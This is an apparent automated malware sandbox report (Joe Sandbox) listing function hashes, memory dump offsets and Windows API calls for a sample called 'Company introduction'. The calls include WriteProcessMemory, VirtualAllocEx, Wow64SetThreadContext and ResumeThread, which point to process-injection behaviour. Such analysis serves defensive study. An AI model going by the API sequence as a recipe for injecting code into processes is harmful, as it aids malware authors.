                                                                                                                                                    • Opcode ID: f056806b6db1a59b91881a98a9b30fe5dd70e74b1ab87748d81cff28eee3088b
                                                                                                                                                    • Instruction ID: 7b88b1b2cc4e867b769a995aa1b3b0398f21240c85a027cfda9d347f2bc64eb7
                                                                                                                                                    • Opcode Fuzzy Hash: f056806b6db1a59b91881a98a9b30fe5dd70e74b1ab87748d81cff28eee3088b
                                                                                                                                                    • Instruction Fuzzy Hash: A82148B2900359DFDB10CFA9C841BDEBBF5FF48324F50842AE558A7250C7789995CBA4
                                                                                                                                                    APIs
                                                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07AEFD6E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ContextThreadWow64
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 983334009-0
                                                                                                                                                    • Opcode ID: 5cf238a32cb4be74f1d03cfcb45109694c08f6a4b652e7204953e4558b22f448
                                                                                                                                                    • Instruction ID: b473aaf32c63627921e30a3a6d0dd2e26d9ed281799e7ab5d3a1bb8e47ec6347
                                                                                                                                                    • Opcode Fuzzy Hash: 5cf238a32cb4be74f1d03cfcb45109694c08f6a4b652e7204953e4558b22f448
                                                                                                                                                    • Instruction Fuzzy Hash: B52139B19002499FDB10DFAAC4857EEBFF4EB88324F10842AD459A7640CB789985CFA5
                                                                                                                                                    APIs
                                                                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07E909C8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739483945.0000000007E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E90000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7e90000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3559483778-0
                                                                                                                                                    • Opcode ID: db59fefc339154c67f386d2014d759d06a68f7907702112518ac595469d7d031
                                                                                                                                                    • Instruction ID: 8c4f0b613d7e078cf702d8e592c2e4c8e56f5758ba761e5e7efec4ff30d3f1f3
                                                                                                                                                    • Opcode Fuzzy Hash: db59fefc339154c67f386d2014d759d06a68f7907702112518ac595469d7d031
                                                                                                                                                    • Instruction Fuzzy Hash: 5D2126B2900359DFDB10DFA9C885BDEBBF5FF88314F10842AE958A7250C7789945CBA4
                                                                                                                                                    APIs
                                                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07E90AA8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739483945.0000000007E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E90000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7e90000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MemoryProcessRead
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1726664587-0
                                                                                                                                                    • Opcode ID: 43074a7dd36cd91781dfbde1f9f96bbd97630d603e74b0fadb43d1dadb247c57
                                                                                                                                                    • Instruction ID: 1e2bb87c685ce08f9c3852b4d00376d93fae7754d22f3ca3bcd8beb2dafbf12c
                                                                                                                                                    • Opcode Fuzzy Hash: 43074a7dd36cd91781dfbde1f9f96bbd97630d603e74b0fadb43d1dadb247c57
                                                                                                                                                    • Instruction Fuzzy Hash: 50214AB29003599FCB10CFAAD841AEEFBF5FF48320F50842AE958A7250C7759545CBA5
                                                                                                                                                    APIs
                                                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07AEFD6E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ContextThreadWow64
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 983334009-0
                                                                                                                                                    • Opcode ID: a2d6496dd587c142b97b4a76ea211688bd173d3cc439b67dafa8845dd64f0dea
                                                                                                                                                    • Instruction ID: b8c6f64a529a711683af490a40ea04207b76c841335dddf8f87f3d76b3cd6bb4
                                                                                                                                                    • Opcode Fuzzy Hash: a2d6496dd587c142b97b4a76ea211688bd173d3cc439b67dafa8845dd64f0dea
                                                                                                                                                    • Instruction Fuzzy Hash: E02138B19002098FDB10DFAAC4857EEBBF4EF88324F108429D459A7240C7789945CFA4
                                                                                                                                                    APIs
                                                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07E90AA8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739483945.0000000007E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E90000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7e90000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MemoryProcessRead
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1726664587-0
                                                                                                                                                    • Opcode ID: 36a7056ec37f984e536ab59e9e2e0adb5e1e1292bbf43e20696278218d807c8d
                                                                                                                                                    • Instruction ID: c4cae77834a00c009541bf0bf7e0d94a96cfc363e1a6c97965a4af2c1a88d148
                                                                                                                                                    • Opcode Fuzzy Hash: 36a7056ec37f984e536ab59e9e2e0adb5e1e1292bbf43e20696278218d807c8d
                                                                                                                                                    • Instruction Fuzzy Hash: FD2139B1800359DFCB10DFAAC845ADEFBF5FF48310F508429E558A7250C7749545CBA4
                                                                                                                                                    APIs
                                                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014BEACF
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1731566834.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_14b0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DuplicateHandle
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3793708945-0
                                                                                                                                                    • Opcode ID: 613b84adaea0d8a3dffae35e259926db589de217d1762147cb1f0a452846c5c0
                                                                                                                                                    • Instruction ID: a1714f3315a6be406522ae6c27bf92721c0ef232643752cd65792f3a6e438c3e
                                                                                                                                                    • Opcode Fuzzy Hash: 613b84adaea0d8a3dffae35e259926db589de217d1762147cb1f0a452846c5c0
                                                                                                                                                    • Instruction Fuzzy Hash: 9921C4B59002589FDB10CF9AD584ADEBFF9FB48310F14841AE954A7350D374A944CFA5
                                                                                                                                                    APIs
                                                                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07E904E6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739483945.0000000007E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E90000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7e90000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                    • Opcode ID: 001a59545b47184f1a73de31dded212e8dab2005aa06a3ee1c78ed425eabed52
                                                                                                                                                    • Instruction ID: 3de2e9fcb0d03e6335ad08575d15ee20a19e9adcb7b4d7b1bde558dfdc98f0d1
                                                                                                                                                    • Opcode Fuzzy Hash: 001a59545b47184f1a73de31dded212e8dab2005aa06a3ee1c78ed425eabed52
                                                                                                                                                    • Instruction Fuzzy Hash: 99115CB29002499FCB10DFA9C4456DEFFF5EF48320F208419E555A7250C775A594CFA4
                                                                                                                                                    APIs
                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 014BB0E5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1731566834.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_14b0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2492992576-0
                                                                                                                                                    • Opcode ID: 9e78a9a47e8ef5391c0dc0cb64a65951eae481e5cedf8a5e19a5d9108e0e3a7c
                                                                                                                                                    • Instruction ID: 5e90ba5171b25e16022d1d1a03efe5109ab9ab7bb0b436827ea179da923c081b
                                                                                                                                                    • Opcode Fuzzy Hash: 9e78a9a47e8ef5391c0dc0cb64a65951eae481e5cedf8a5e19a5d9108e0e3a7c
                                                                                                                                                    • Instruction Fuzzy Hash: D411BBB1801399CFDB20CF9AC8447EEBFF4EB09314F1084AAD599A7242C3399644CFA5
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07E904E6
Memory Dump Source
• Source File: 00000000.00000002.1739483945.0000000007E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7e90000_Company introduction.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 014BC7C6
Memory Dump Source
• Source File: 00000000.00000002.1731566834.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_14b0000_Company introduction.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
APIs
• PostMessageW.USER32(?,00000010,00000000,?), ref: 07E94FBD
Memory Dump Source
• Source File: 00000000.00000002.1739483945.0000000007E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7e90000_Company introduction.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
APIs
• PostMessageW.USER32(?,00000010,00000000,?), ref: 07E94FBD
Memory Dump Source
• Source File: 00000000.00000002.1739483945.0000000007E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7e90000_Company introduction.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
Memory Dump Source
• Source File: 00000000.00000002.1731228820.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_145d000_Company introduction.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1731228820.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_145d000_Company introduction.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1731320392.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_146d000_Company introduction.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1731320392.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_146d000_Company introduction.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1731320392.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_146d000_Company introduction.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1731228820.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_145d000_Company introduction.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1731228820.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_145d000_Company introduction.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                    • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                    • Instruction ID: 2b4411970616674620164b2528b67dad447995cd8ca2c0531ccbd08d04c30adb
                                                                                                                                                    • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                    • Instruction Fuzzy Hash: 8C11CD72804284CFCB02CF54D9C4B16BF61FB84218F24C6AADC090B267C336D45ACBA1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1731320392.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_146d000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                    • Instruction ID: 547cbec026e244d3e64e8841aacc7d49d842da07941216df17a5a71f025703d6
                                                                                                                                                    • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                    • Instruction Fuzzy Hash: 58118E75A04240DFDB16CF54D5C4B16BF61FB84228F28C6AAD8494B766C33AD44ACB52
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: H4ux$H4ux$nay$nay
                                                                                                                                                    • API String ID: 0-2454568754
                                                                                                                                                    • Opcode ID: 5d5411ff31e2a02ef739ad3e081ff8901be109f354dfca17468023f909c2b0e0
                                                                                                                                                    • Instruction ID: bfaa1c049800f7440ee85a4fa7c40fb7c5d57f45a014817110e9df8801502f62
                                                                                                                                                    • Opcode Fuzzy Hash: 5d5411ff31e2a02ef739ad3e081ff8901be109f354dfca17468023f909c2b0e0
                                                                                                                                                    • Instruction Fuzzy Hash: 14D13BB0E11219CFDB14CFA9E980A9DFBB6FF89304F2491A9E419AB355DB309941CF50
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: %O@8$%O@8$tQ=)$tQ=)
                                                                                                                                                    • API String ID: 0-749352435
                                                                                                                                                    • Opcode ID: 5ead03c8abc5f094e1d023b0e7cbc6bcc5fc049a66da70675b3a766ea3bee7e7
                                                                                                                                                    • Instruction ID: 4eedeefd50a7d6c08b7045d8dcadc9378ba5b00cfeb851486ea8adb2b41d374c
                                                                                                                                                    • Opcode Fuzzy Hash: 5ead03c8abc5f094e1d023b0e7cbc6bcc5fc049a66da70675b3a766ea3bee7e7
                                                                                                                                                    • Instruction Fuzzy Hash: 5E71F1B4E11609DFCB08CF99D584A9EFBF5FF89310F14856AE425AB260D734AA41CF50
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 18'$18'$aY$aY
                                                                                                                                                    • API String ID: 0-3687307736
                                                                                                                                                    • Opcode ID: a0f65c220d01545b81efe146ced3282914f1bed28b962e64efd5a1042467150f
                                                                                                                                                    • Instruction ID: ae9ed743e817e034243e3acc641363d17ca7ca0a466677857c1bc6e65b9e92d6
                                                                                                                                                    • Opcode Fuzzy Hash: a0f65c220d01545b81efe146ced3282914f1bed28b962e64efd5a1042467150f
                                                                                                                                                    • Instruction Fuzzy Hash: 817103B5E1120ADFCB04CF99D5809AEFBB9FF89310F14851AD825AB304D734A982CF95
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: %O@8$tQ=)$tQ=)
                                                                                                                                                    • API String ID: 0-2920369752
                                                                                                                                                    • Opcode ID: ae0f66a93ebd53c736c557d70f6b1e6d239dcc1315db04161866c4fed1f9e72e
                                                                                                                                                    • Instruction ID: 98b67d00c5d275ed4d80332f47f35a2b608835bf1113e374090f4fd7040e89ce
                                                                                                                                                    • Opcode Fuzzy Hash: ae0f66a93ebd53c736c557d70f6b1e6d239dcc1315db04161866c4fed1f9e72e
                                                                                                                                                    • Instruction Fuzzy Hash: 5E7112B4E1160ADFCB08CFA9D58499EFBF5FF89310F14856AE425AB260D730AA41CF50
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: ,uRR$6yu[$6yu[
                                                                                                                                                    • API String ID: 0-86511755
                                                                                                                                                    • Opcode ID: 4b138b6bdb284cfe0061498d9dd7241fdd8ccadf3bf4454d2d4a7332bbd2e7f2
                                                                                                                                                    • Instruction ID: a067dd5ad504ce45c786ae299aa355b49938815c6b3527d6ac9a4233d1adf6fb
                                                                                                                                                    • Opcode Fuzzy Hash: 4b138b6bdb284cfe0061498d9dd7241fdd8ccadf3bf4454d2d4a7332bbd2e7f2
                                                                                                                                                    • Instruction Fuzzy Hash: 504105B0E1520ADFCF08CFAAC5815AEFBF6EF89304F24D46AC415A7254D7349E818B95
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: ,uRR$6yu[$6yu[
                                                                                                                                                    • API String ID: 0-86511755
                                                                                                                                                    • Opcode ID: 5cd2d0c24b43c0e56105cb364b7988038240df86c8191c1d75adfc8acfd7a0ad
                                                                                                                                                    • Instruction ID: 6e045a788fb1fa798df69bf7e40fe9d49511480ae27737ba156e648ded49556c
                                                                                                                                                    • Opcode Fuzzy Hash: 5cd2d0c24b43c0e56105cb364b7988038240df86c8191c1d75adfc8acfd7a0ad
                                                                                                                                                    • Instruction Fuzzy Hash: A341F5B0E1520ADBCF04CFAAC5815AEFBF6FF89304F60D46AC415B7254D7349A828B95
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 9u"K$Zjsq
                                                                                                                                                    • API String ID: 0-1261923490
                                                                                                                                                    • Opcode ID: 9c760aff0c4abefe3f555e6d94bf8d221bcdbbcf2a99dbc798cc7e663b9fb1cd
                                                                                                                                                    • Instruction ID: 11d7935d2966e311dc725b57afb96e58ceb6ba1402e7ddd8a5110bac8b118fcb
                                                                                                                                                    • Opcode Fuzzy Hash: 9c760aff0c4abefe3f555e6d94bf8d221bcdbbcf2a99dbc798cc7e663b9fb1cd
                                                                                                                                                    • Instruction Fuzzy Hash: 27C124B0E15219DFCB08CFAAD58059EFBF6BF99300F14D52AD429AB224D730A942CF54
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 9u"K$Zjsq
                                                                                                                                                    • API String ID: 0-1261923490
                                                                                                                                                    • Opcode ID: b07afb423a4aee6c64bb1eb66e623a0bd76528eb0dbb4e21db2d3b5a5f04e188
                                                                                                                                                    • Instruction ID: f780ce44a01fe4687dd2f11f11e569a5e4669bebe2f41e0cba463c79595c543b
                                                                                                                                                    • Opcode Fuzzy Hash: b07afb423a4aee6c64bb1eb66e623a0bd76528eb0dbb4e21db2d3b5a5f04e188
                                                                                                                                                    • Instruction Fuzzy Hash: 32C1F5B0E15219DFCB18CFAAD58059EFBF6BF99300F14D52AD425AB228D730A942CF54
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: \~$$or
                                                                                                                                                    • API String ID: 0-2796768027
                                                                                                                                                    • Opcode ID: d6912433d63ce9e0a2d5f30b5bb59cb87060cc24989aedff572d67ea7fc1da8b
                                                                                                                                                    • Instruction ID: 6a9f58d5137e1a7a73feeac7a3447f18bc9c18b598c585b210e8891e24d883f8
                                                                                                                                                    • Opcode Fuzzy Hash: d6912433d63ce9e0a2d5f30b5bb59cb87060cc24989aedff572d67ea7fc1da8b
                                                                                                                                                    • Instruction Fuzzy Hash: 626158B4E1524A8FCB18CFAAD5415AEFBF6EF89310F10902AE425A7354D7349A42CF94
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: \~$$or
                                                                                                                                                    • API String ID: 0-2796768027
                                                                                                                                                    • Opcode ID: dd709d2b57309649c61f1b8330d48fccc60711a28a6621aef1c47194d7baa703
                                                                                                                                                    • Instruction ID: 5ebf672b132b90f60d2bd8c55b2eaf3ae54fb69c252eebe47f4607f56bb320f9
                                                                                                                                                    • Opcode Fuzzy Hash: dd709d2b57309649c61f1b8330d48fccc60711a28a6621aef1c47194d7baa703
                                                                                                                                                    • Instruction Fuzzy Hash: F46138B4E1521ADFCB04CFAAD5415AEFBF6EF89310F10902AE425A7354E7345A41CF94
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 18'$aY
                                                                                                                                                    • API String ID: 0-535677718
                                                                                                                                                    • Opcode ID: ee08b0cdb98d355829b41cde821afd4fe331da3e7d2d80b5d3db7558148e2976
                                                                                                                                                    • Instruction ID: e0105dee09d7509f358650c631381b89faf9af9237faa0fc33998b6de54ff673
                                                                                                                                                    • Opcode Fuzzy Hash: ee08b0cdb98d355829b41cde821afd4fe331da3e7d2d80b5d3db7558148e2976
                                                                                                                                                    • Instruction Fuzzy Hash: 6C6115B5E1120ACFCB04CFA9C5809AEFBB6FF49310F14851AD425AB314D734A982CF95
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: .dlk
                                                                                                                                                    • API String ID: 0-1029699734
                                                                                                                                                    • Opcode ID: 673233f9042b2f840d6c91f7dfd4ae3551cf25761902e37703de43ab374093b1
                                                                                                                                                    • Instruction ID: 0c5a3e8709210551bd5222070c36c4071bc4fe02650d15516896e70cb12c5874
                                                                                                                                                    • Opcode Fuzzy Hash: 673233f9042b2f840d6c91f7dfd4ae3551cf25761902e37703de43ab374093b1
                                                                                                                                                    • Instruction Fuzzy Hash: 22E1E7B4E001198FCB54CFA9D5809AEBBF6FF89304F249169E414AB356D734AD41CFA1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: ?w=>
                                                                                                                                                    • API String ID: 0-1933253675
                                                                                                                                                    • Opcode ID: bcf9ca5787348d406389969acaeb4b09ec0b19710107e2c5282d9f195f11c59e
                                                                                                                                                    • Instruction ID: 2cdac4ec359b439b6297d0dde44ed149376f8b42155aa417455c87c3d10c98d1
                                                                                                                                                    • Opcode Fuzzy Hash: bcf9ca5787348d406389969acaeb4b09ec0b19710107e2c5282d9f195f11c59e
                                                                                                                                                    • Instruction Fuzzy Hash: 8CB12BB0D15219DFDB18CFA6D98099EFBB6FF99300F10D42AD425AB264DB349902CF50
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: ?w=>
                                                                                                                                                    • API String ID: 0-1933253675
                                                                                                                                                    • Opcode ID: 5e9d151cfca1c09eec47797eb029cc573eddc6156713679bebd9a6d10291a228
